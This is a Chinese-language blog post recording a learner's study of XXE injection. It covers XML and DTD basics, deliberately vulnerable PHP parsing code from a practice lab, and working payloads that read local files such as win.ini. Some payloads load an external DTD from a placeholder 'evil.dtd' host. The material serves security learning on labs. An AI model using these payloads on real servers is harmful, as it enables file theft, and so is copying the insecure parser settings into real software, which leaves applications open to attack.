<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/rustymoon/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/rustymoon/images/backbone.jpg">
  <link rel="icon" type="image/png" sizes="16x16" href="/rustymoon/images/backbone.jpg">
  <link rel="mask-icon" href="/rustymoon/images/logo.svg" color="#222">

<link rel="stylesheet" href="/rustymoon/css/main.css">


<link rel="stylesheet" href="/rustymoon/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/rustymoon/lib/pace/pace-theme-minimal.min.css">
  <script src="/rustymoon/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"github.com","root":"/rustymoon/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"right","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="不知道从何说起就这放一张图吧。纪念一下第一次看懂port swigger的鸟语。">
<meta property="og:type" content="article">
<meta property="og:title" content="XXE的一些学习">
<meta property="og:url" content="https://github.com/66lueflam144/rustymoon.git/2023/11/30/XXE-test/index.html">
<meta property="og:site_name" content="RustyMoon">
<meta property="og:description" content="不知道从何说起就这放一张图吧。纪念一下第一次看懂port swigger的鸟语。">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://github.com/rustymoon/2023/11/30/XXE-test/xxelab1.png">
<meta property="og:image" content="https://github.com/rustymoon/2023/11/30/XXE-test/xxedemo.png">
<meta property="og:image" content="https://github.com/rustymoon/2023/11/30/XXE-test/burpxxe.png">
<meta property="og:image" content="https://github.com/rustymoon/2023/11/30/XXE-test/xxelabwin.png">
<meta property="og:image" content="https://github.com/rustymoon/2023/11/30/XXE-test/xxelab1.png">
<meta property="og:image" content="https://github.com/rustymoon/2023/11/30/XXE-test/error.png">
<meta property="article:published_time" content="2023-11-30T09:36:25.000Z">
<meta property="article:modified_time" content="2023-12-02T13:55:20.670Z">
<meta property="article:author" content="lueflam">
<meta property="article:tag" content="XXE">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://github.com/rustymoon/2023/11/30/XXE-test/xxelab1.png">

<link rel="canonical" href="https://github.com/66lueflam144/rustymoon.git/2023/11/30/XXE-test/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

<script>
    (function(){
        if(''){
            if (prompt('请输入查看密码') !== ''){
                alert('密码不正确,请询问主编大大！');
                history.back();
            }
        }
    })();
</script>
  <title>XXE的一些学习 | RustyMoon</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/rustymoon/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">RustyMoon</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">66144</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/rustymoon/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/rustymoon/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/rustymoon/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
        <li class="menu-item menu-item-commonweal">

    <a href="/rustymoon/404/" rel="section"><i class="fa fa-heartbeat fa-fw"></i>Commonweal 404</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="Searching..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="https://github.com/66lueflam144/rustymoon.git/2023/11/30/XXE-test/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/rustymoon/images/fa.jpg">
      <meta itemprop="name" content="lueflam">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="RustyMoon">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          XXE的一些学习
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2023-11-30 17:36:25" itemprop="dateCreated datePublished" datetime="2023-11-30T17:36:25+08:00">2023-11-30</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2023-12-02 21:55:20" itemprop="dateModified" datetime="2023-12-02T21:55:20+08:00">2023-12-02</time>
              </span>

          <br>
            <span class="post-meta-item" title="Symbols count in article">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">Symbols count in article: </span>
              <span>4.4k</span>
            </span>
            <span class="post-meta-item" title="Reading time">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">Reading time &asymp;</span>
              <span>4 mins.</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>不知道从何说起就这放一张图吧。纪念一下第一次看懂port swigger的鸟语。</p>
<img src="/rustymoon/2023/11/30/XXE-test/xxelab1.png" class>

<span id="more"></span>

<h1 id="XML"><a href="#XML" class="headerlink" title="XML"></a>XML</h1><blockquote>
<p>Extensible Markup Language</p>
</blockquote>
<p>a markup language and file format</p>
<p>主要目的是序列化，即存储、传输、重构任意数据。</p>
<p>一个example：</p>
<pre class="line-numbers language-markup" data-language="markup"><code class="language-markup">//XML声明即是位于XML文档开始部分的第一行，规定了xml版本和编码格式
<span class="token prolog">&lt;?xml version="1.0" encoding="UTF-8"?></span>

//每个xml文档必有一个根元素，这里指<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>note</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>note</span><span class="token punctuation">></span></span>
  <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>to</span><span class="token punctuation">></span></span>Tove<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>to</span><span class="token punctuation">></span></span>
  <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>from</span><span class="token punctuation">></span></span>Jani<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>from</span><span class="token punctuation">></span></span>
  <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>heading</span><span class="token punctuation">></span></span>Reminder<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>heading</span><span class="token punctuation">></span></span>
  <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>body</span><span class="token punctuation">></span></span>Don't forget me this weekend!<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>body</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>note</span><span class="token punctuation">></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>



<h2 id="特点"><a href="#特点" class="headerlink" title="特点"></a>特点</h2><p>通过 XML 您可以发明自己的标签<br>上面实例中的标签没有在任何 XML 标准中定义过（比如 <code>&lt;to&gt;</code>和 <code>&lt;from&gt;</code>）。这些标签是由 XML 文档的创作者发明的。</p>
<p>这是因为 XML 语言没有预定义的标签。</p>
<p>HTML 中使用的标签都是预定义的。HTML 文档只能使用在 HTML 标准中定义过的标签（如 <code>&lt;p&gt;</code>、<code>&lt;h1&gt;</code> 等等）。</p>
<p>XML 允许创作者定义自己的标签和自己的文档结构。</p>
<h2 id="与HTML有区别"><a href="#与HTML有区别" class="headerlink" title="与HTML有区别"></a>与HTML有区别</h2><p>XML 不是 HTML 的替代。</p>
<p>XML 和 HTML 为不同的目的而设计：</p>
<ul>
<li><p>XML 被设计用来传输和存储数据，其焦点是数据的内容。</p>
</li>
<li><p>HTML 被设计用来显示数据，其焦点是数据的外观。</p>
</li>
<li><p>HTML 旨在显示信息，而 XML 旨在传输信息。</p>
</li>
</ul>
<p><a target="_blank" rel="noopener" href="https://www.runoob.com/xml/xml-usage.html">更多详情在这里</a></p>
<h2 id="DTD"><a href="#DTD" class="headerlink" title="DTD"></a>DTD</h2><blockquote>
<p>Document Type Definition</p>
</blockquote>
<h3 id="DTD引用"><a href="#DTD引用" class="headerlink" title="DTD引用"></a>DTD引用</h3><ul>
<li><p>DTD内部声明<br><code>&lt;!DOCTYPE root_element [declare]&gt;</code></p>
</li>
<li><p>DTD外部引用<br><code>&lt;!DOCTYPE root_element  SYSTEM &quot;enternal DTD file path/url&quot;&gt;</code></p>
</li>
<li><p>引用公共DTD<br><code>&lt;!DOCTYPE root_element  PUBLIC &quot;DTD name&quot; &quot;public dtd url&quot;&gt;</code></p>
</li>
</ul>
<h3 id="DTD实体声明"><a href="#DTD实体声明" class="headerlink" title="DTD实体声明"></a>DTD实体声明</h3><ul>
<li><p>内部实体声明<br><code>&lt;!ENTITY entity_name &quot;entity value&quot;&gt;</code></p>
</li>
<li><p>外部实体声明<br><code>&lt;!ENTITY entity_name SYSTEM &quot;url/uri&quot;&gt;</code></p>
</li>
<li><p>通用实体<br><code>&amp;</code>引用的实体，在DTD中定义，xml中引用</p>
</li>
<li><p>参数实体<br><code>%</code>引用的实体，在DTD中定义，DTD中使用，可以在外部引用</p>
</li>
</ul>
<h1 id="XML注入"><a href="#XML注入" class="headerlink" title="XML注入"></a>XML注入</h1><p><a target="_blank" rel="noopener" href="https://uuzdaisuki.com/2018/07/23/xml%E6%B3%A8%E5%85%A5%E6%94%BB%E5%87%BB%E6%80%BB%E7%BB%93/">一个关于XML注入的简单总结</a></p>
<h1 id="XXE-XML-External-Entity-Injection"><a href="#XXE-XML-External-Entity-Injection" class="headerlink" title="XXE(XML External Entity Injection)"></a>XXE(XML External Entity Injection)</h1><blockquote>
<p>XML注入的一种，针对于外部实例</p>
</blockquote>
<h2 id="demo-test"><a href="#demo-test" class="headerlink" title="demo test"></a>demo test</h2><pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token variable">$xml</span> <span class="token operator">=</span> <span class="token function">simplexml_load_string</span><span class="token punctuation">(</span><span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'xml'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">print_r</span><span class="token punctuation">(</span><span class="token variable">$xml</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token delimiter important">?></span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>
<p>用 POST 进行传参 ：</p>
<pre class="line-numbers language-markup" data-language="markup"><code class="language-markup">xml=<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>note</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>to</span><span class="token punctuation">></span></span>Tove<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>to</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>from</span><span class="token punctuation">></span></span>Jani<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>from</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>heading</span><span class="token punctuation">></span></span>Reminder<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>heading</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>body</span><span class="token punctuation">></span></span>Don't forget me this weekend!<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>body</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>note</span><span class="token punctuation">></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>得到结果：</p>
<img src="/rustymoon/2023/11/30/XXE-test/xxedemo.png" class>


<hr>

<p>进行进一步的测试</p>
<p>升级一下：</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>

    <span class="token function">libxml_disable_entity_loader</span> <span class="token punctuation">(</span><span class="token constant boolean">false</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">//用来禁用或启用 libxml 库中的实体加载器。参数 false 表示启用实体加载器。</span>
    <span class="token variable">$xmlfile</span> <span class="token operator">=</span> <span class="token function">file_get_contents</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'php://input'</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">//从 PHP 的输入流中读取数据，并将其存储在 $xmlfile 变量中。</span>
    <span class="token variable">$dom</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">DOMDocument</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">//创建了一个新的 DOMDocument 对象，该对象表示一个 XML 或 HTML 文档。</span>
    <span class="token variable">$dom</span><span class="token operator">-></span><span class="token function">loadXML</span><span class="token punctuation">(</span><span class="token variable">$xmlfile</span><span class="token punctuation">,</span> <span class="token class-name">LIBXML_NOENT</span> <span class="token operator">|</span> <span class="token class-name">LIBXML_DTDLOAD</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment">//使用 $xmlfile 中的 XML 数据加载 DOMDocument 对象，后面两个是解析选项</span>
    <span class="token variable">$creds</span> <span class="token operator">=</span> <span class="token function">simplexml_import_dom</span><span class="token punctuation">(</span><span class="token variable">$dom</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">//将 DOMDocument 对象转换为 SimpleXMLElement 对象，以便更容易地处理 XML 数据</span>
    <span class="token keyword">echo</span> <span class="token variable">$creds</span><span class="token punctuation">;</span><span class="token comment">//将 SimpleXMLElement 对象转换为字符串，并输出</span>

<span class="token delimiter important">?></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h2 id="直接利用"><a href="#直接利用" class="headerlink" title="直接利用"></a>直接利用</h2><p>以Windows环境为例：</p>
<p>post传入</p>
<pre class="line-numbers language-markup" data-language="markup"><code class="language-markup"><span class="token prolog">&lt;?xml version="1.0"?></span>
<span class="token doctype"><span class="token punctuation">&lt;!</span><span class="token doctype-tag">DOCTYPE</span> <span class="token name">a</span> <span class="token punctuation">[</span><span class="token internal-subset">
	&lt;!ENTITY b SYSTEM "file:///c:/windows/win.ini">
</span><span class="token punctuation">]</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>c</span><span class="token punctuation">></span></span><span class="token entity named-entity" title="&b;">&amp;b;</span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>c</span><span class="token punctuation">></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>喜提：<br><code>; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1</code></p>
<h2 id="远程调用DTD"><a href="#远程调用DTD" class="headerlink" title="远程调用DTD"></a>远程调用DTD</h2><p>在直接利用的基础上修改</p>
<pre class="line-numbers language-markup" data-language="markup"><code class="language-markup"><span class="token prolog">&lt;?xml version="1.0"?></span>
<span class="token doctype"><span class="token punctuation">&lt;!</span><span class="token doctype-tag">DOCTYPE</span> <span class="token name">a</span> <span class="token punctuation">[</span><span class="token internal-subset">
	&lt;!ENTITY b SYSTEM "http://xxxx/xxx.dtd">
</span><span class="token punctuation">]</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>c</span><span class="token punctuation">></span></span><span class="token entity named-entity" title="&b;">&amp;b;</span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>c</span><span class="token punctuation">></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>xxx.dtd中写：</p>
<pre class="line-numbers language-dtd" data-language="dtd"><code class="language-dtd">&lt;!ENTITY b SYSTEM &quot;file:&#x2F;&#x2F;&#x2F;c:&#x2F;windows&#x2F;win.ini&quot; &gt;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>


<p>效果same</p>
<hr>

<h2 id="xxe-lab-test"><a href="#xxe-lab-test" class="headerlink" title="xxe-lab test"></a>xxe-lab test</h2><p>在进行next level前，来做一个简单的靶场xxe lab</p>
<p>做的php版本（大差不差）</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php">//doLogin.php
<span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token comment">/**
* autor: c0ny1
* date: 2018-2-7
*/</span>

<span class="token variable">$USERNAME</span> <span class="token operator">=</span> <span class="token string single-quoted-string">'admin'</span><span class="token punctuation">;</span> <span class="token comment">//账号</span>
<span class="token variable">$PASSWORD</span> <span class="token operator">=</span> <span class="token string single-quoted-string">'admin'</span><span class="token punctuation">;</span> <span class="token comment">//密码</span>
<span class="token variable">$result</span> <span class="token operator">=</span> <span class="token constant">null</span><span class="token punctuation">;</span>

<span class="token function">libxml_disable_entity_loader</span><span class="token punctuation">(</span><span class="token constant boolean">false</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$xmlfile</span> <span class="token operator">=</span> <span class="token function">file_get_contents</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'php://input'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token keyword">try</span><span class="token punctuation">&#123;</span>
  <span class="token comment">//可以参考上面那个升级版demo的解释</span>
	<span class="token variable">$dom</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">DOMDocument</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token variable">$dom</span><span class="token operator">-></span><span class="token function">loadXML</span><span class="token punctuation">(</span><span class="token variable">$xmlfile</span><span class="token punctuation">,</span> <span class="token class-name">LIBXML_NOENT</span> <span class="token operator">|</span> <span class="token class-name">LIBXML_DTDLOAD</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token variable">$creds</span> <span class="token operator">=</span> <span class="token function">simplexml_import_dom</span><span class="token punctuation">(</span><span class="token variable">$dom</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

	<span class="token variable">$username</span> <span class="token operator">=</span> <span class="token variable">$creds</span><span class="token operator">-></span><span class="token property">username</span><span class="token punctuation">;</span>
	<span class="token variable">$password</span> <span class="token operator">=</span> <span class="token variable">$creds</span><span class="token operator">-></span><span class="token property">password</span><span class="token punctuation">;</span>

  <span class="token comment">//进行检查</span>
	<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token variable">$username</span> <span class="token operator">==</span> <span class="token variable">$USERNAME</span> <span class="token operator">&amp;&amp;</span> <span class="token variable">$password</span> <span class="token operator">==</span> <span class="token variable">$PASSWORD</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
		<span class="token variable">$result</span> <span class="token operator">=</span> <span class="token function">sprintf</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"&lt;result>&lt;code>%d&lt;/code>&lt;msg>%s&lt;/msg>&lt;/result>"</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">,</span><span class="token variable">$username</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token punctuation">&#125;</span><span class="token keyword">else</span><span class="token punctuation">&#123;</span>
		<span class="token variable">$result</span> <span class="token operator">=</span> <span class="token function">sprintf</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"&lt;result>&lt;code>%d&lt;/code>&lt;msg>%s&lt;/msg>&lt;/result>"</span><span class="token punctuation">,</span><span class="token number">0</span><span class="token punctuation">,</span><span class="token variable">$username</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token punctuation">&#125;</span>	
<span class="token punctuation">&#125;</span><span class="token keyword">catch</span><span class="token punctuation">(</span><span class="token class-name">Exception</span> <span class="token variable">$e</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
	<span class="token variable">$result</span> <span class="token operator">=</span> <span class="token function">sprintf</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"&lt;result>&lt;code>%d&lt;/code>&lt;msg>%s&lt;/msg>&lt;/result>"</span><span class="token punctuation">,</span><span class="token number">3</span><span class="token punctuation">,</span><span class="token variable">$e</span><span class="token operator">-></span><span class="token function">getMessage</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>

<span class="token function">header</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'Content-Type: text/html; charset=utf-8'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">echo</span> <span class="token variable">$result</span><span class="token punctuation">;</span>
<span class="token delimiter important">?></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>主要看<code>echo</code>在echo个什么，很明显的是<code>$result</code>，所以回去看这个参数有些什么。</p>
<p><code>$username</code> &amp; <code>msg</code></p>
<p>通过抓包看到的是</p>
<img src="/rustymoon/2023/11/30/XXE-test/burpxxe.png" class>

<p>所以实体要在<code>$username</code>里面进行引用</p>
<p>then it goes like:</p>
<img src="/rustymoon/2023/11/30/XXE-test/xxelabwin.png" class>

<hr>

<p>在port swigger lab的XXE 1时，非常简单一个道理：</p>
<p>就如图所示：</p>
<img src="/rustymoon/2023/11/30/XXE-test/xxelab1.png" class>

<hr>
<hr>

<h1 id="Next-Level"><a href="#Next-Level" class="headerlink" title="Next Level"></a>Next Level</h1><blockquote>
<p>当文件内容比较非常规的时候，读取解析会出现错误</p>
</blockquote>
<p>比如这个：</p>
<pre class="line-numbers language-txt" data-language="txt"><code class="language-txt">KITS.AI
# etc :/eta heard him say
....we can go&amp;wherever%you###like<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p>再次执行之前成功的payload就会得到很多报错：</p>
<img src="/rustymoon/2023/11/30/XXE-test/error.png" class>

<hr>

<p>解决这个问题的一个有效方法就是使用<code>&lt;![CDATA[]]&gt;</code></p>
<blockquote>
<p>在 XML 中，<!--[CDATA[]]--> 的作用是保护一些特殊字符，例如小于号 &lt; 等，使其不被解析。这是因为在 XML 文档的解析过程中，字符 &lt; 和 &amp; 会被解析为新元素或字符实体的开始。因此，如果希望一些字符被视为纯文本而不是 XML 语法，可以将它们放在 <!--[CDATA[]]--> 中。</p>
</blockquote>
<p>乍一看心情是：what are you fucking talking about？</p>
<p>举个例子</p>
<p>用初始xml进行改造：</p>
<pre class="line-numbers language-markup" data-language="markup"><code class="language-markup"><span class="token prolog">&lt;?xml version="1.0" encoding="utf-8"?></span>
<span class="token doctype"><span class="token punctuation">&lt;!</span><span class="token doctype-tag">DOCTYPE</span> <span class="token name">creds</span> <span class="token punctuation">[</span><span class="token internal-subset">
   &lt;!ENTITY goodies SYSTEM "file:///c:/windows/win.ini">
</span><span class="token punctuation">]</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>creds</span><span class="token punctuation">></span></span><span class="token entity named-entity" title="&goodies;">&amp;goodies;</span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>creds</span><span class="token punctuation">></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<hr>

<p>在引用上加<code>&lt;![CDATA[]]&gt;</code></p>
<pre class="line-numbers language-markup" data-language="markup"><code class="language-markup"><span class="token prolog">&lt;?xml version="1.0" encoding="utf-8"?></span>
<span class="token doctype"><span class="token punctuation">&lt;!</span><span class="token doctype-tag">DOCTYPE</span> <span class="token name">creds</span> <span class="token punctuation">[</span><span class="token internal-subset">
   &lt;!ENTITY goodies SYSTEM "file:///C:/Users/haerinwon/Desktop/ai.txt">
</span><span class="token punctuation">]</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>creds</span><span class="token punctuation">></span></span><span class="token cdata">&lt;![CDATA[&amp;goodies;]]></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>creds</span><span class="token punctuation">></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>得到结果是<code>&amp;goodies;</code></p>
<hr>


<pre class="line-numbers language-markup" data-language="markup"><code class="language-markup">//payload
<span class="token prolog">&lt;?xml version="1.0" encoding="utf-8"?></span> 
<span class="token doctype"><span class="token punctuation">&lt;!</span><span class="token doctype-tag">DOCTYPE</span> <span class="token name">roottag</span> <span class="token punctuation">[</span><span class="token internal-subset">
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>!ENTITY</span> <span class="token attr-name">%</span> <span class="token attr-name">start</span> <span class="token attr-name">"&lt;![CDATA["</span><span class="token punctuation">></span></span>   
&lt;!ENTITY % goodies SYSTEM "file:///d:/test.txt">  
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>!ENTITY</span> <span class="token attr-name">%</span> <span class="token attr-name">end</span> <span class="token attr-name">"]]</span><span class="token punctuation">></span></span>">  
&lt;!ENTITY % dtd SYSTEM "http://ip/evil.dtd"> 
%dtd; </span><span class="token punctuation">]</span><span class="token punctuation">></span></span> 

<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>roottag</span><span class="token punctuation">></span></span><span class="token entity named-entity" title="&all;">&amp;all;</span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>roottag</span><span class="token punctuation">></span></span>

//evil.dtd
<span class="token prolog">&lt;?xml version="1.0" encoding="UTF-8"?></span> 
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>!ENTITY</span> <span class="token attr-name">all</span> <span class="token attr-name">"%start;%goodies;%end;"</span><span class="token punctuation">></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>tbc..</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/rustymoon/tags/XXE/" rel="tag"># XXE</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
